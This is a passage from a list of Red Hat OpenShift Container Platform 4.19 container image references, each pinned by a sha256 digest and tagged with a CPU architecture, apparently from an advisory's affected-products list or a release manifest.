"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
